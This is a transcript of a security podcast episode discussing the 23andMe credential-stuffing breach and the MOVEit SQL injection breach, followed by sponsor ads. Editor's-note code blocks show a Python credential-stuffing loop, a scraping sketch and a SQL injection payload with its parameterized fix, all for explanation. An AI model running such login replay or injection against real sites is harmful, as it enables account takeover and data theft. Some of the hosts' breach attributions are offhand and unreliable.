23andMe Exposed + AI Watermarks + Announcing Hotline Hacked

Released Monday, 16th October 2023

Episode Transcript

Transcripts are displayed as originally observed. Some content, including advertisements, may have changed.
0:01

I just took a DNA test. Turns

0:03

out I'm 100% that victim of a massive data

0:06

breach. This week on Hacked,

0:08

genetics firm 23andMe reveals user

0:10

data stolen. We're going to talk about it. We're

0:13

also going to talk about the MOVEit

0:15

breach. Finally, it's been a few

0:18

months in the making, but it seems to be tying into many

0:20

of the stories and things that we're looking at and reading today.

0:22

Then since the early days of generative AI, we've been

0:24

hearing about how crucial a role watermarking

0:27

is going to play in fighting misinformation

0:29

and maintaining copyright. How is that going?

0:32

According to experts, poorly. We're

0:34

going to talk about it. Also the

0:37

group known as ALPHV,

0:40

ALPHV, ALPHV, Black

0:43

Cat, whatever you'd like to call them, the ransomware

0:45

group is back at it. So

0:47

we talked about them in the Las Vegas episodes. They

0:50

are back at it again. So we're just going to touch

0:52

on what they're up to. All that and more in this

0:54

chat episode of Hacked.

1:00

Scott, how are we doing this week?

1:12

Good,

1:18

good. I'm

1:21

moments away from jetting

1:23

over to your part of the world and going to pick

1:25

chanterelle mushrooms in the wild. So

1:29

I'm off for the weekend to go mushroom picking.

1:32

So that should be fun. Not the mushroom type

1:34

that I think most people would think, but probably

1:38

going to make some good risotto. It

1:40

should be nice. You

1:43

can make a good risotto with the other kind of mushrooms people

1:45

are thinking about. Oh my God, could you? I've never even

1:47

thought about that. That seems treacherous. No,

1:51

it is treacherous. It's

1:53

very true. That's a good word for it. It would be a treacherous

1:56

meal. The

1:58

yeah, but we'll be kind of

1:59

up in Tofino, so hopefully we'll get a little surfing

2:02

in. We'll see how the waves are, but we're mostly

2:04

there to pick mushrooms, so we'll see how that goes. Good

2:07

times. I've actually never been up to Tofino. Me and

2:09

my partner were just talking about going up there sometime

2:11

soon as well. You know what? Neither have I.

2:13

Shocking. Oh, sick. To everybody

2:16

that I know: island living. I don't live

2:18

in... but I have not not done it. Island

2:21

Scott. I don't think I've ever seen island

2:23

Scott. Oh, island Scott existed. Like when I lived

2:25

in, when I lived

2:27

in Hawaii, island Scott was, was full,

2:30

full-fledged, full on. Oh

2:32

yeah, I forgot you did have an

2:35

island Scott era. Yeah, I did, I did. I would

2:37

love to have another island Scott era, honestly.

2:39

Maybe that's something that I should be tuning

2:41

my life for, is to become an islander

2:44

again. Board shorts every

2:47

day. Every day, every

2:49

day. Board shorts, Hawaiian,

2:51

Hawaiian print floral button-ups.

2:54

You know, it's a, it's a vibe. It's a vibe.

2:57

And yeah, I can't lie, I enjoyed that vibe

2:59

very much. You know who also brings

3:02

a sort of easy, breezy,

3:05

floral print board shorts island kind

3:07

of vibe? Who's that? I'm talking about Sarah

3:09

Gardner, our new patron

3:11

on our trusty Patreon.

3:14

Oh yes, yes.

3:16

Thank you very much, Sarah. And I think

3:19

Walt Kimbro would also vibe, vibe

3:22

pretty hard in the hacked island compound. I think he

3:24

would. I think Walt Kimbro has, like, I'm

3:26

seeing him with, like, a Mai Tai, a big, a

3:29

big drink, like a really big

3:32

island vibe drink. Him,

3:35

him and Floyd Clark. And Floyd

3:37

Clark is running the Margaritaville constantly

3:40

at the island villa. Yeah, that's them, they're

3:42

out there. Floyd Clark, thank you very much. And putting

3:45

a pin in the whole thing, fittingly: Ender.

3:49

I think, I think Ender's like the dark horse on

3:51

the island. He's sort of overseeing it, isn't he,

3:53

like, in the bird's nest up top, making

3:55

sure everything's okay. Maybe like a lighthouse. Ender.

3:59

What a name to end on. I

4:02

know, right? Except for the sad, the

4:04

sad fact that

4:06

we have one more. Sufjan Bonnie.

4:09

Oh, we did miss

4:11

one. I jumped straight into the middle of the list. I'm so

4:13

sorry, Sufjan Bonnie. Thank

4:16

you so much for your support. It

4:18

means a lot to us. And also, we're going to see

4:20

you. You get a hammock for that. You get like a really

4:22

nice hammock and

4:25

a drink made of a coconut. A cabana.

4:28

A cabana

4:30

by the by the ocean. Cabana with a coconut

4:33

drink. Thank you all so much for your support.

4:36

If you also want to support tech

4:40

storytelling and bullshit about tech,

4:42

I don't know if we curse on this show. You

4:45

should support. We do. Great.

4:48

I should know that. I curse on this show. Me

4:50

too. I guess I did know that. I've told a guest

4:52

recently they can curse on this show. So you can curse on

4:55

this show. All of you supporters,

4:57

new and old, can curse on the show. If you want to support

5:00

tech content and stories and chat,

5:03

hackedpodcast.com. It's a great way to support the show. It

5:06

directs to our Patreon and it means the world to us.

5:09

No problem.

5:12

Any

5:15

other news now that we've got our travel

5:18

stories and plans out in the open and a

5:20

bit of patron thank

5:22

yous? Is there anything else we want to touch on before we get going?

5:25

Maybe a new

5:28

thematic episode type that we're thinking

5:31

about doing? Yeah, I

5:33

think we maybe do. So fun little

5:36

insight for users. My cat is ferociously

5:38

attacking me right now. I'm just

5:40

going to pod through it. I'm podding through.

5:43

We're going to do a little experiment. I'm

5:45

hoping the website's up and running good

5:47

by the time we drop this one. So

5:50

a few episodes ago we talked about the idea of a call-in

5:52

show. I love call-in shows.

5:54

I think, Scott, you've expressed some appreciation

5:57

for them in the past. Classics.

5:59

They're classics. You got your love lines. It's

6:02

a great medium, it's a great format. And

6:04

we just started thinking about what would it be like if

6:07

there was, I don't know, some kind of a hotline,

6:11

a hacked hotline, dare

6:13

I say, a hotline hacked?

6:16

I could have handed it to you on that

6:18

one. You were- You could have handed it to me, but

6:20

you chose not to. You wanted to hit it. It's

6:24

your name, you take the credit,

6:26

you roll with it. I chose violence. This isn't

6:28

hotline Miami, it's a hotline hack. Yeah,

6:30

all good, all good. Yeah,

6:34

the idea behind it. Take it away.

6:36

Let's give everybody a little thing. Is we're

6:40

gonna have essentially a voicemail

6:42

line. You can call and leave a message

6:44

where you tell us a story about

6:47

either a cybercrime that you committed

6:50

or a cybercrime that was committed to you or

6:52

that you were aware of or in the

6:54

periphery for if you're like a security

6:56

officer and we're

6:58

gonna kind of listen to these back and figure out which ones are

7:01

kind of good stories and we're gonna turn them

7:03

into episode content. You

7:06

got it. What do you think of that? I think that's bang

7:08

on. I think it's like we want those

7:10

cybercrimes, but we just want like strange tales

7:12

of technology. Like maybe you hacked

7:15

into something, maybe you solved an internet mystery,

7:17

maybe you like got into

7:20

a thing you shouldn't have. We just

7:22

want you to either submit an audio file or leave

7:24

a message at the hotline and we'll talk

7:26

about it on these hotline hacked episodes.

7:28

If this worked, if it

7:31

might not work, this might be the last you

7:33

hear about this. We might get no content.

7:36

Nobody reaches out. The content might be, I say

7:40

this with so much love, unhinged and

7:42

we just won't do this. But I'm

7:44

hoping, we talked to so many people

7:46

that listen to this show and they always have these really cool stories

7:49

and I never quite know, we

7:52

never quite know what to do with all of them, whether

7:54

or not they can make up a whole episode. And

7:58

this is just a space where we can talk about different

8:00

stories and sort of speculate

8:02

about what people call in and leave

8:05

on the hotline hacked. So there will

8:07

be an email option to email in either

8:09

text or an audio

8:11

file. We do send

8:13

in an audio file. Be aware that we

8:15

probably will play it in the episode. Same with

8:18

the phone number. Or at least an edited version of it. Yeah.

8:21

Same, yeah, yeah. Same with the phone number voicemail,

8:23

so be aware. If you

8:25

wanna make sure it's more anonymized, just

8:27

send it in some text and then we'll digitize it

8:30

into the voice of a reader and use

8:32

that. Or we'll read

8:34

it ourselves, one of the two. Or we'll read

8:36

it ourselves. Yeah, if you wanna submit text, there's the email

8:38

on the website. And

8:41

as we said, it's kind of as anonymous as you make

8:43

it. You can go to hotlinehacked.com. Hotlinehacked.com

8:47

to find... Hotline...

8:49

Take it away. Land it. Land

8:52

the plane. I was gonna say, hotlinehacked.com.

8:56

Hotlinehacked.com. Visit it today. Visit

8:59

it today. I'm gonna

9:01

record like, oh man, like weird late night infomercials

9:04

for this. We should also

9:06

tell everybody before anybody visits the

9:08

website that Jordan generated

9:10

the website on ChatGPT. So

9:14

it's very basic, it's very

9:16

functional. It's got some pretty sweet

9:19

JavaScript text coloring elements.

9:22

I wasn't fishing for you to compliment the JavaScript,

9:25

but I do appreciate it. Hey,

9:27

hey, hey. I'm here for you. Last

9:30

week it's Python, this week it's HTML and

9:32

CSS. Like who are you? The

9:34

next thing you know, you'll

9:37

be writing malware in Rust. We'll

9:39

all be in trouble. Then what?

9:42

You'll be joining ALPHV. ALPHV. Alpha or

9:44

ALPHV. ALPHV. And

9:47

maybe you're part of ALPHV or Clop

9:49

or any number of people getting up to stuff. Maybe you just

9:51

have an interesting story, but we would

9:54

love to hear it at hotlinehacked.

9:57

Our brand spanking new

10:00

franchise, or our "whatever

10:02

happened to that?" that someone asks us about in

10:04

five episodes. Only one of the two.

10:06

Dead in the water idea. Totally. Yeah,

10:09

yeah. Speaking

10:13

of which, I heard this interesting, I read in

10:15

our news articles, it has nothing to do with anything we're about

10:17

to talk about, but I thought it was funny. You

10:20

just, like, used a little statement that made

10:22

me realize it. Did you know that there's apparently

10:24

a generational shift for

10:27

the phrase out of pocket? So

10:30

like, we found like, Jordan's out of pocket

10:32

this weekend. To me, that means like Jordan's

10:34

kind of wilding out. You know, he's like, he's

10:37

out of pocket. Oh. But apparently

10:39

in the older generations, out of

10:41

pocket means like I'm out of the office. It's

10:43

like, oh, I'm gonna be out of pocket today at two.

10:46

And it's everybody's like, huh? Oh,

10:49

I had no idea. But apparently there's this generational

10:51

gap for the phrase out of pocket.

10:54

I just found it interesting. I have no idea why I just inserted

10:56

this, but I found it interesting. I thought you'd find it interesting.

10:59

I do find it interesting. You know how I feel about idioms

11:01

and etymology. See, what's

11:03

interesting about that is that I thought,

11:06

I think of out of pocket as neither of those things.

11:08

Really? I don't think of it as being like in absentia

11:10

or wilding out. I think of it as being

11:13

like based, like about money

11:15

and transactions. Oh, like you. Like

11:17

it was like the cost of the concert was like

11:19

a bunch of the example on Google. I'm not gonna, someone's

11:22

gonna check and see that I'm reading this. The organizer of the

11:24

concert was $15,000 out of pocket after

11:27

it was canceled. Yeah, that's how I think of it. Like

11:30

it's a cost thing. Like you put money up

11:32

for that. I think I see that

11:34

too. Like that's a classic. I'm

11:37

out of pocket 10 grand for this or whatever, but

11:39

it's like, if I'm like Jordan's

11:42

out of pocket, does your mind

11:44

go to, is Jordan in the office

11:47

or not in the office or does it go to, is

11:49

Jordan? It doesn't go to either. Jordan was

11:51

actually on the beach at the hacked cabana,

11:54

because mine goes to the latter. Interesting.

11:58

My brain goes. exclusively to Jordan

12:01

did a bad business. Now he's feeling

12:03

it. Like, wow.

12:06

He spent all that money on the hacked cabana.

12:09

And now he doesn't have that money because

12:11

of the storm that claimed the hacked

12:14

cabana. That's what I think about out of

12:16

pocket. Okay.

12:19

Interesting, but I think we should move through

12:21

this. Yeah. Let's get into this one. Five

12:24

years ago, there was a situation with a

12:26

DNA testing service called MyHeritage.

12:30

Someone breached 92 million of this DNA

12:32

testing company's accounts. Do you remember this?

12:35

I do not. It wasn't

12:37

a good news story, but when they announced what

12:39

the infiltrator got access to, there

12:42

was sort of a sigh of relief because

12:44

they got access to encrypted emails and passwords. And

12:46

everyone went, oh, for sure, user data. Exactly.

12:50

Everyone went, phew, that could have been bad because

12:52

they never reached any kind of genetic data. I

12:55

was reminded of that this past

12:58

Friday when 23andMe, a

13:00

US-based biotechnology and genomics

13:03

firm, confirmed a data breach

13:05

of their user accounts. The company

13:07

said that hackers accessed certain

13:10

accounts of 23andMe users. I would

13:12

say it's not just any genetic

13:15

testing company. That's got to be

13:17

the biggest one I know of. They're

13:19

the one I think. Yeah,

13:21

I know lots of people that have done

13:24

23andMe testing. Yeah,

13:26

me too. I remember a few

13:28

years ago thinking about doing it, and

13:31

I didn't not do it because of

13:33

some privacy-based

13:35

awakening. I didn't do it because I lost

13:38

interest. It's there but by the grace

13:40

of God. And let's be clear, not every

13:43

single 23andMe account was breached.

13:45

And it's not to say that 23andMe itself

13:48

was necessarily breached.

13:50

There's some nuance here. But

13:52

the outcome is pretty gnarly. And

13:54

I think it kind of paints a picture

13:56

of what a spectrum of genetics-based

13:59

leaks can look like.

14:02

This

14:05

announcement came a couple days after hackers started advertising

14:07

an alleged sample of

14:10

this 23andMe user data on the hacking forum BreachForums,

14:12

offering to sell these profiles for between $1 and $10.

14:16

These sort of early samples, which a couple

14:19

different places were able to verify, were organized

14:22

based on the descent of the users.

14:25

So there was essentially a little

14:28

cluster being sold of 100,000 Chinese users. There

14:32

was a cluster being sold of a million

14:34

Ashkenazi Jewish descendant users.

14:38

A spokesperson from 23andMe confirmed

14:40

that the data that is in these leaks is legitimate.

14:43

And what it looks like happened is threat actors

14:45

used essentially a credential stuffing attack. So

14:48

credentials that were in other breaches that were recycled

14:51

on 23andMe were used to get into these accounts. Quote,

14:55

they clarified, quote, we don't have any indication

14:58

at this time that there has been a data security incident within their systems. It

15:02

was a credential stuffing technique. Let's

15:07

segue before we get into the actual

15:09

hack and to talk about credential stuffing just a bit.

15:12

If you're an old hacked fan, you would have listened to

15:14

the problem with passwords. I

15:17

think it was one of our

15:19

first four or five podcast episodes. And

15:22

I think that this style of attack is

15:24

the main reason why you need a unique password for every

15:26

site or else you just become... With

15:30

the scale and velocity of data exploitation

15:32

style hacks where they're

15:34

pulling out user records, if

15:39

you have a password that's guessable, even

15:41

within a reasonable timeline of months,

15:45

chances are you're vulnerable to having a pretty nasty set of

15:47

this style of attacks happen to you. I

15:52

think that that's something... I've

15:54

set up my wife's password

15:56

manager now. Everybody that I come

15:59

into contact with, I recommend using unique

16:01

passwords on everything, complex passwords

16:04

as well as changing them with frequency. And

16:06

I think that's as long as we live in this

16:08

antiquated password-based life, which

16:11

I don't think we're gonna get away from because even

16:13

if we use other things as forms

16:15

of biometrics or whatever,

16:18

all they do is get encoded into passwords anyway.

16:20

So realistically it's all just data.

16:23

So at the end of the day the

16:25

best thing to do is to just have different data

16:27

for each site so that this doesn't become

16:29

a problem for you. 100%.
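[Editor's note: a minimal sketch of what the credential stuffing being described looks like in practice. Everything here, the endpoint URL, the emails, the passwords, is hypothetical, purely for illustration.]

```python
# Credential stuffing, sketched: replay credentials leaked from one
# breach against a completely different site. All names and the URL
# below are made up for illustration.
import requests

LOGIN_URL = "https://example-target.invalid/api/login"  # hypothetical endpoint

# Pairs harvested from an unrelated breach dump (fabricated examples).
leaked_credentials = [
    ("alice@example.com", "hunter2"),
    ("bob@example.com", "correcthorse"),
]

def try_login(email: str, password: str) -> bool:
    """Return True if the recycled credentials still work on this site."""
    resp = requests.post(LOGIN_URL, json={"email": email, "password": password})
    return resp.status_code == 200

for email, password in leaked_credentials:
    if try_login(email, password):
        # A unique password per site drives this hit rate to zero,
        # which is the whole argument for a password manager.
        print(f"reused password still valid for {email}")
```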

16:31

For the

16:32

folks that it did become a problem

16:35

for, leaked data included

16:37

full names, usernames, profile

16:39

photos, sex, date of birth, geographical

16:43

location, and genetic ancestry

16:45

results. So a

16:48

pretty gnarly doxxing as

16:50

doxxings go.

16:53

BleepingComputer found that the number of accounts sold

16:55

by cyber criminals doesn't necessarily

16:57

match the number of 23andMe accounts

17:00

that were breached using the exposed credentials.

17:02

At the heart of this whole thing is something

17:04

called this DNA relatives feature.

17:07

And it's essentially like a toggle that you

17:09

can choose to use or not use that lets you find

17:11

and connect with genetic relatives, indexes

17:15

other people that share some sort of genetic

17:17

relationship with you based on your 23andMe

17:19

results. And what it looks like the

17:22

threat actor did was, by

17:24

only accessing a few 23andMe

17:27

accounts through this credential stuffing, they

17:30

were able to scrape enough data from the DNA

17:32

relative matches to start building out essentially

17:34

like a database of different people that shared

17:37

certain genetic markers. This is

17:39

how we ended up in a situation where you would have a breach

17:42

of just here's a list of people that share this

17:45

ethnic background. You wouldn't

17:47

really be able to do that without a system

17:49

like DNA relatives unless the

17:51

hacker had gotten full access to

17:53

23andMe systems. But because

17:56

of that feature, just through user

17:58

accounts, they were able to create these, you know, million

18:00

strong lists. And

18:07

given that we know more accounts were breached than

18:12

have been exposed in

18:14

these leaks, we

18:17

can probably assume more of these lists are

18:19

going to come.
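[Editor's note: to make the scraping mechanic concrete, here is a rough sketch of how a handful of stuffed accounts fans out through a relative-matching feature. The function below is a hypothetical stand-in; 23andMe's actual API is not being described here.]

```python
# Sketch: why a relative-matching feature multiplies a small breach.
# fetch_relative_matches() is a hypothetical placeholder for whatever
# authenticated endpoint returns one user's DNA-relative list.

def fetch_relative_matches(session_token: str) -> list[dict]:
    """Hypothetical: profiles visible to a single logged-in account."""
    raise NotImplementedError  # stands in for an authenticated API call

def scrape(compromised_tokens: list[str]) -> dict[str, dict]:
    profiles: dict[str, dict] = {}  # keyed by profile id, deduplicated
    for token in compromised_tokens:
        for match in fetch_relative_matches(token):
            # Each breached account exposes hundreds of OTHER users'
            # names, ancestry results, and rough locations.
            profiles[match["id"]] = match
    return profiles

# A few thousand stuffed accounts, each seeing on the order of a
# thousand relatives, is how million-strong lists get built without
# ever touching the company's internal systems.
```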

18:23

Yeah, I feel like this is going to be one of those data sets, and

18:29

it becomes the classic thing

18:31

of like, it's

18:34

like the Ashley Madison hack. If

18:39

you were in there, it's like the damage

18:41

was done. You

18:44

don't need to sell it or, you know, there's

18:48

no way to look to monetize this, but

18:52

it's like if all of your genetic data is floating

18:54

around on the internet, plug

18:57

them in, oh yeah, his data is here. Oh,

19:01

look, he's got hereditary markers

19:05

for X, Y, and Z. Okay, denied. You

19:10

kind of beat me to the thing I wanted to

19:12

bring up, which

19:15

is that like, I don't really know, when

19:17

I think of like a breach forum, where

19:20

people are buying and selling this information,

19:24

and it's not a short-

19:27

term thing. But

19:29

what we know is that the information that's in these data breaches

19:34

that we think of as being

19:36

bought and sold from cybercriminals tends

19:40

to end up on a long enough timeline getting

19:42

packaged up and bought and sold and

19:45

bought and sold, and

19:48

it kind of works its way up the chain of legitimacy

19:52

from these to companies that shouldn't be buying this

19:54

data illicitly but have a huge financial

19:57

incentive to have it. That's

20:00

where genetic breaches go. And

20:02

it would be an icky world if that's where it goes.

20:06

But we don't live in an icky world, do we, Jordan? I

20:09

sure hope not. I

20:11

sure hope not. The last thing

20:13

on this one, I went down a bit of a rabbit hole because

20:16

I saw that first story from a few years

20:18

ago. I remembered it. And I went

20:20

looking for like breaches and

20:22

data leaks relating to genetic information.

20:25

And there's this WaPo story from 2022, quote,

20:28

since the beginning of last year, more than a dozen

20:30

medical labs, genetic testing companies and fertility

20:33

firms have disclosed breaches affecting more than 3.5 million

20:35

people, according

20:37

to a Cybersecurity 202 review of data breaches.

20:40

Wow. And it's just interesting

20:42

to me that, small labs

20:45

that have the actual, like

20:47

people's genes, like the actual

20:49

raw data are as good

20:51

an attack target as like

20:53

a massive company like 23andMe, depending

20:56

on how granular this data is. And

20:58

it just sort of makes me reflect on the more and more

21:00

genetic data we start producing and digitizing,

21:03

the bigger a target it's gonna become. And unlike

21:05

a credit card, there

21:08

are some things you can't really change when they get leaked. See,

21:13

the problem is like this data is super valuable

21:15

too to the person. Like if you know you have

21:17

specific markers for heart diseases

21:19

and cancers, you can be well aware and

21:22

more up on making

21:24

sure that you're checked and tested.

21:26

Totally. There's a lot of positive that can come

21:28

to this data. So it's sad that

21:31

it just becomes one of these things where it's like, well, there's

21:33

a bunch of negatives that can come out of it too. And it's

21:35

just a byproduct of the world we live

21:37

in. But I think over the next 100 years, we'll

21:40

see changes come to the industries

21:43

that were worried about having this data. And

21:46

hopefully changes come to the industries that

21:49

we hope have this data. Yeah,

21:51

it's true. Like if my family doctor knew what I'm like,

21:54

you know, medical history of your

21:56

parents is such an important thing. And

21:58

it's like, well, this is... your DNA

22:01

essentially is the codified

22:03

version of the medical history of your family. So

22:05

it's like, now that they've deciphered

22:08

the codes, having the code

22:10

is a good thing. And it's like, I think that this is probably

22:13

something that in society we don't take advantage

22:15

of enough. No, it's true. From a wellness

22:17

and health perspective. Yeah, I wanna see

22:20

us getting better at leveraging

22:23

genetic data and be really

22:25

like, I

22:28

think a lot of the ways big companies handle

22:31

data breaches, it's like I'm regularly

22:33

kind of disappointed by it because it's like anything,

22:35

it's PR. You're trying to minimize a situation.

22:37

You're not necessarily being totally forthright

22:40

with what happened. And this is such a

22:43

delicate, sensitive thing. That

22:46

like, we need to build systems of security

22:48

and trust to allow us to have

22:50

this information and to use it to the best of

22:52

our ability. If the potential upside isn't like

22:55

a better chat messaging app, it's like

22:57

people's lives. The stakes are very,

22:59

very high. We should be advancing

23:01

this and getting better. But like, man, we

23:03

just need more trust and more security

23:06

in these systems. Icky

23:10

shit will happen. That

23:12

to me is a perfect segue to

23:15

the MOVEit breach. If you wanna talk about the MOVEit breach.

23:17

Heck yeah, let's talk about the MOVEit breach. So

23:20

MOVEit is a data

23:24

transfer system created

23:26

by Progress Software that

23:29

is built to be a

23:31

high-security movement system to

23:34

move hypersensitive information.

23:37

Corporate secrets, personal information,

23:40

HR stuff, anything that's,

23:42

you need to move, but you wanna make sure it doesn't

23:46

get out there. Like

23:48

if you go to their website, the first

23:51

sentence at the top of the page is talking about security

23:53

standards and protocols and cybersecurity

23:55

things. Anyway, so

23:57

one of these

23:59

pieces of software,

23:59

MOVEit by Progress

24:02

got compromised. And it's not the first one of its

24:04

kind to be compromised because it's actually hacking groups

24:07

that target these styles of software because

24:09

they know that they're so valuable. So

24:13

it's the same thing. Same thing as the genetic data.

24:16

It's like if you put a bunch of valuable

24:18

information into a place, people

24:20

that want valuable information are gonna try to get

24:22

it. And it's the same thing with MOVEit. So

24:25

MOVEit was behind, I believe

24:28

it was the MGM hack or

24:30

one of the Vegas hacks or both of them

24:32

maybe. Can't remember. It

24:34

was behind the Sony hack that we talked

24:36

about last time. And it's been

24:38

behind a boatload of other hacks. Like they're estimating

24:42

something like 600 organizations have fallen

24:44

prey to one ransomware group's

24:46

use of it. So even

24:49

the vulnerability, the CVE that came out on

24:51

it was given a 9.8 out of 10. So

24:53

like essentially out of all the severity

24:56

that a potential vulnerability in a piece of software

24:58

could have, this is like one of the top. Yeah.

25:02

So I didn't know what MOVEit was.

25:05

And the thing that put this on my radar,

25:08

like you said, last episode, we talked about these

25:10

sort of, what were then brief early murmurings

25:13

of another Sony leak. And

25:16

I was fascinated as you brought up to find

25:18

out that it was part of what's looking maybe

25:20

by the numbers like one of the biggest hacks of 2023. Not

25:24

a singular hack. Part

25:27

of this much larger sort of supply chain attack

25:29

involving this file transfer protocol,

25:31

maybe you could call it, MOVEit. File

25:33

transfer system. Yeah. So

25:35

Sony confirmed that they were part of this MOVEit

25:37

breach. For them it was 6,800 users. Data

25:41

extortion gang CLOP has claimed

25:43

responsibility for the breach. The

25:46

breach seems to have exploited a zero day vulnerability

25:48

in MOVEit. And it's looking, as I

25:51

said, like probably, yeah, one of the biggest hacks

25:53

of 2023 and potentially

25:55

in like over the last couple years, it's

25:57

looking like, you mentioned the 600 organizations through one

26:00

ransomware gang, 56 million

26:07

individual users across that, and

26:11

a global cost of close to 11 billion as

26:14

of time of recording. Pretty

26:18

astonishing. Affected

26:21

entities so far have included Shell, British

26:23

Airways, Sony, and the US Department of Energy. Progress

26:27

Software patched it, as you mentioned, but

26:30

clearly as we are seeing this month, the

26:32

damage has already been done. This

26:35

vulnerability I think dates back to April, if

26:39

I'm not mistaken. The

26:41

first things you heard about

26:43

it dated back to April. They patched it pretty quick,

26:47

but of course like any kind of system software

26:50

that has remote deployments and stuff, whether

26:54

IT departments around the world patched fast enough,

26:56

things like that, or whether there was already access granted to

26:59

the world. The

27:01

way the exploit works too, is

27:04

it's kind of a classic SQL injection. They

27:08

can kind of force a piece of SQL into a query going into it, which

27:12

then causes remote code execution. I

27:15

think what they were doing is using it to deploy web

27:18

shells and essentially remote access

27:21

shells so they could get in, either A, go through

27:23

the database directly, since

27:26

that's where the data

27:29

was, or B, create new

27:32

accounts, etc. So

27:35

I know that they were using it as a jump off

27:37

point to launching attacks

27:40

further into networks, which is what I think

27:42

happened with Sony, if I'm not mistaken. They

27:44

managed to kind of

27:46

get in

27:47

and kind of spider through the networks.

27:49

Not good. It's

27:52

a massive remote shell exploit.

27:56

And

27:58

the world's paying the price for it.
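[Editor's note: a toy illustration of the bug class being described, not MOVEit's actual code, which has not been published in this form. The table and parameter names are made up. It shows attacker text being pasted into a SQL string versus handled as a parameter.]

```python
# Toy SQL injection demo using Python's built-in sqlite3. This is the
# bug class, not MOVEit itself.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE files (id INTEGER, owner TEXT)")
conn.execute("INSERT INTO files VALUES (1, 'alice')")

user_input = "x' OR '1'='1"  # attacker-controlled request parameter

# VULNERABLE: the input is pasted straight into the SQL text, so the
# attacker's quote breaks out of the string literal and rewrites the query.
query = f"SELECT * FROM files WHERE owner = '{user_input}'"
print(conn.execute(query).fetchall())  # every row comes back: [(1, 'alice')]

# SAFE: a parameterized query treats the input as data, never as SQL.
print(conn.execute(
    "SELECT * FROM files WHERE owner = ?", (user_input,)
).fetchall())  # []: the literal string matches no owner
```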

28:00

Yeah, there's typically like, I

28:02

don't know, it's always sort of hard to, maybe

28:05

none of these attacks ever really have that much

28:07

of a narrative, but it's a lot easier to make a narrative

28:09

when it's a hacking group going after one individual

28:11

target. This is so strange because you have

28:14

like, British Airways and the Department

28:16

of Energy, you also have like healthcare facilities

28:19

to sort of go back to what we were talking about with

28:21

genetics. A bunch

28:23

of sensitive information is already being confirmed

28:25

as having leaked, as being stolen

28:27

as part of this vulnerability. Lab

28:29

test results. BORN Ontario,

28:31

a government birth registry, recently disclosed

28:33

a MOVEit-related attack. It

28:36

looks like hackers stole data from 3.4 million people, including

28:39

two million babies, expectant parents

28:41

and people seeking fertility care. That

28:44

data gathered over like a decade as

28:46

part of this attack that was not

28:48

explicitly targeting birth registries,

28:51

but because this was a supply chain

28:53

attack of a very commonly used

28:55

like tech utility, they

28:58

just sort of got the keys to a bunch of different

29:00

castles, including one

29:03

with two million babies in it. And

29:05

Sony. And Sony, and your PlayStation.

29:08

And Sony, and your PlayStation.

29:11

The, yeah, big, big,

29:14

big problem, big hack, big

29:16

vulnerability. And

29:19

the reality is there's probably still unpatched

29:21

versions of it kicking around. So I think we're still

29:23

seeing, like there's still exploits

29:26

and hacks that are connected back to

29:28

this coming up now. So

29:30

it's funny that it's a piece of,

29:34

well, it's not funny. It's ironic that

29:36

it's a piece of software that was acquired,

29:40

set up and configured to

29:42

make sure that privacy was upheld

29:44

and to reduce the risk of stuff like this. And

29:46

then next thing you know, that's the main

29:49

thing that's kicked the door open

29:51

on it. Okay,

29:53

when we come back from the break,

29:56

we talk about AI watermarks and

29:59

the folks over at ALPHV. Hello,

30:30

whether you are selling scented soap or offering outdoor

30:33

outfits, Shopify helps you sell everywhere.

30:36

From their all-in-one e-commerce platform to

30:38

their in-person point of sale system, wherever

30:41

and whatever you are selling, Shopify

30:43

has got you covered. Shopify helps you turn

30:45

browsers into buyers with the internet's best converting

30:48

checkout, 36% better

30:50

on average compared to other leading commerce

30:52

platforms. What I love about Shopify

30:55

is that no matter how big you want to grow, Shopify

30:57

gives you everything you need to take control

30:59

and take your business to the next level.

31:03

Sign up for a $1 a month trial

31:05

period at Shopify.com slash

31:07

hacked, all lower case. You

31:09

go to Shopify.com slash

31:12

hacked, right now to grow your

31:14

business no matter what stage you are

31:16

in. That's Shopify.com

31:19

slash hacked. This

31:21

episode of hacked is supported by Compiler,

31:24

an original podcast from Red Hat discussing tech

31:27

topics big, small and strange. Compiler

31:29

comes to you from the makers of Command Line Heroes

31:32

and is hosted by Angela Andrews and

31:34

Brent Simoneaux. Compiler closes the

31:36

gap between those who are new to tech and

31:38

those behind the inventions and services

31:41

shaping our world. Compiler

31:43

brings together stories and perspectives from the industry

31:45

and simplifies its language, culture

31:48

and movements in a way that is fun,

31:50

informative and guilt-free.

31:53

I checked out the In Defense of Legacy

31:55

Technology episode and it's all about how younger

31:57

IT professionals often start their

31:59

careers working on legacy hardware and software,

32:03

and upgrades aren't always an option. It's kind of about

32:05

asking that question, how can they learn and grow

32:07

while still working with older technology?

32:09

Very interesting story. Listen

32:12

to Compiler, in your favorite podcast

32:14

player. We'll also include a link in the show notes.

32:17

My thanks to Compiler for their support.

32:19

Today's podcast is sponsored

32:22

by NutriSense. That was the sound of the NutriSense

32:24

biosensor. It's a small device you can put on the back

32:27

of your arm that then provides real-time feedback

32:29

on how your body responds to the foods that you are eating,

32:31

your exercise, stress, and even your sleep. With

32:34

NutriSense, you can just take a photo of your meal, adjust

32:36

your portion size, and NutriSense does the rest.

32:39

NutriSense helps you track your data, see your glucose

32:42

trends, and understand your macronutrient breakdown

32:44

for each meal. You also get an overall

32:46

glucose score for each meal based on your body's

32:48

response. You'll be matched with a board-certified

32:51

nutritionist who will review your data

32:53

and answer all your questions. Plus,

32:56

they can help you get a personalized nutrition plan so you can help

32:58

achieve your goals. Try NutriSense

33:00

today. It will open your eyes in profound ways to how your

33:02

food, exercise, and lifestyle choices are affecting

33:05

you. What's more, it empowers you with a real-time

33:07

feedback loop showing the consequences of your food

33:09

and lifestyle choices. It is a powerful

33:12

tool for understanding your body and affecting positive

33:14

change in your life. You can get all this

33:16

today. NutriSense has a special offer

33:19

for our listeners. Visit NutriSense.com

33:21

slash hacked and use promo code hacked to

33:23

start decoding your body's messages and pave

33:25

the way for a healthier life. Be sure to tell them that

33:27

you learned about NutriSense on Hacked Podcast.

33:30

That's NutriSense.com slash hacked. Save $30

33:33

off your first month, plus get a month of board-certified

33:36

nutritionist support.

33:37

Let's talk interest rates. Not that kind

33:39

of interest. I mean, interest in you.

33:41

At First Merchants Bank, we are 100% interested in your success.

33:45

Our bankers provide a level of attentiveness unlike

33:48

any other. We're here to get to know you and

33:50

to be a helpful partner in your financial success. Aren't

33:52

you tired of your bank just saying they care about

33:55

your business? Make the switch to First Merchants

33:57

Bank and feel the difference of real, honest

33:59

interest.

33:59

First Merchants Bank. For a better

34:02

banking experience, visit firstmerchants.com slash

34:04

